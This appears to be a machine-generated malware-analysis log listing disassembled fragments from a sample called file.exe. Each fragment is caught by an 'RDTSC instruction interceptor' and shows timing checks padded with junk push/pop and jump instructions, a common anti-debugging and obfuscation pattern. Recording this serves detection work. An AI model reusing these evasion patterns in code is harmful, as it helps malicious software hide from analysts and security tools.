Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F5A3 second address: C3F5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7A4900AE66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F5AE second address: C3F5DF instructions: 0x00000000 rdtsc 0x00000002 je 00007F7A4994017Ch 0x00000008 jg 00007F7A49940176h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F7A49940182h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jbe 00007F7A49940184h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F5DF second address: C3F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F682 second address: C3F68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F68B second address: C3F68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FD2E second address: C3FD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FD33 second address: C3FD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FD39 second address: C3FD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FFF9 second address: C3FFFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FFFD second address: C25960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D27D9h], ebx 0x00000010 call dword ptr [ebp+122D1B66h] 0x00000016 jne 00007F7A49940190h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F7A49940183h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D302 second address: C7D31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F7A4900AE71h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D31B second address: C7D334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7A49940176h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A4994017Ah 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D334 second address: C7D338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86BA4 second address: C86BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7A49940176h 0x0000000a pop eax 0x0000000b je 00007F7A4994017Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jo 00007F7A49940176h 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F7A49940176h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86BC5 second address: C86BC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C857FA second address: C857FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C857FE second address: C85804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85804 second address: C8580D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8580D second address: C85818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7A4900AE66h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85818 second address: C8581D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8581D second address: C85825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85825 second address: C8582B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8582B second address: C8584C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7A4900AE76h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8584C second address: C85858 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7A49940176h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85858 second address: C8585E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C859E3 second address: C859E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C859E7 second address: C85A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE76h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85A01 second address: C85A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7A49940176h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85A0F second address: C85A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85B86 second address: C85B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F7A49940176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85B91 second address: C85B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85B99 second address: C85BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F7A49940176h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85BA9 second address: C85BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85BB4 second address: C85BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E7F second address: C85E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E83 second address: C85EB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940188h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7A49940188h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85EB9 second address: C85EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7A4900AE66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8645B second address: C86460 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86460 second address: C8647A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7A4900AE71h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8647A second address: C8647E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C89E31 second address: C89E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C89E3B second address: C89E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C9DA second address: C8C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C9E2 second address: C8CA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A49940186h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CA03 second address: C8CA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CA09 second address: C8CA0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CB6C second address: C8CB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F7A4900AE66h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CB79 second address: C8CB7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CB7E second address: C8CBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007F7A4900AE66h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnp 00007F7A4900AE6Eh 0x00000016 jp 00007F7A4900AE66h 0x0000001c push edi 0x0000001d pop edi 0x0000001e je 00007F7A4900AE81h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CCC4 second address: C8CCDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A49940185h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CCDE second address: C8CCFC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7A4900AE80h 0x00000008 jmp 00007F7A4900AE74h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8F36F second address: C8F392 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F7A49940176h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007F7A49940186h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8F041 second address: C8F04F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F7A4900AE66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C93D07 second address: C93D24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7A4994017Fh 0x0000000d jbe 00007F7A49940176h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C933BB second address: C933E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7A4900AE74h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C933E3 second address: C933E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C933E7 second address: C933EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C933EB second address: C93415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A49940183h 0x00000011 jmp 00007F7A4994017Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C93997 second address: C9399B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9399B second address: C939A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7A49940176h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C939A7 second address: C939C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F7A4900AEA2h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C939C5 second address: C939F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7A49940176h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7A4994017Ch 0x00000014 jmp 00007F7A49940188h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ADE2 second address: C9AE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4900AE6Dh 0x00000009 jmp 00007F7A4900AE76h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jmp 00007F7A4900AE75h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C999CE second address: C999D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99B43 second address: C99B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99B47 second address: C99B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99B4B second address: C99B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99B5B second address: C99B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99B5F second address: C99B8D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7A4900AE66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7A4900AE75h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F7A4900AE66h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99B8D second address: C99BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940182h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99D36 second address: C99D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Eh 0x00000007 jl 00007F7A4900AE6Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99E80 second address: C99E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99E99 second address: C99E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99E9D second address: C99EA9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7A49940176h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99EA9 second address: C99EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FA21 second address: C3FA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F7A49940185h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f jnl 00007F7A49940178h 0x00000015 pop esi 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F7A49940178h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jc 00007F7A4994017Ch 0x00000037 mov edx, dword ptr [ebp+122D2A18h] 0x0000003d push 00000004h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F7A49940178h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FA9A second address: C3FA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3FA9E second address: C3FAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9AB4B second address: C9AB51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ED74 second address: C9ED7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ED7E second address: C9ED8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4900AE6Ch 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0B9 second address: C9E0CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4994017Ch 0x00000009 jp 00007F7A49940176h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0CF second address: C9E0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E37E second address: C9E388 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7A49940176h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E388 second address: C9E396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F7A4900AE66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E976 second address: C9E97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA59A9 second address: CA59AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA59AF second address: CA59B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5FC8 second address: CA5FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5FCE second address: CA5FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5FD4 second address: CA5FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA650F second address: CA6515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6515 second address: CA651A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA651A second address: CA6537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940180h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F7A49940176h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6537 second address: CA6541 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6541 second address: CA654B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7A49940176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6DBA second address: CA6DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6DBE second address: CA6DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6DC7 second address: CA6DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7A4900AE70h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA1CD second address: CAA1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA643 second address: CAA64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAA5B second address: CAAA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
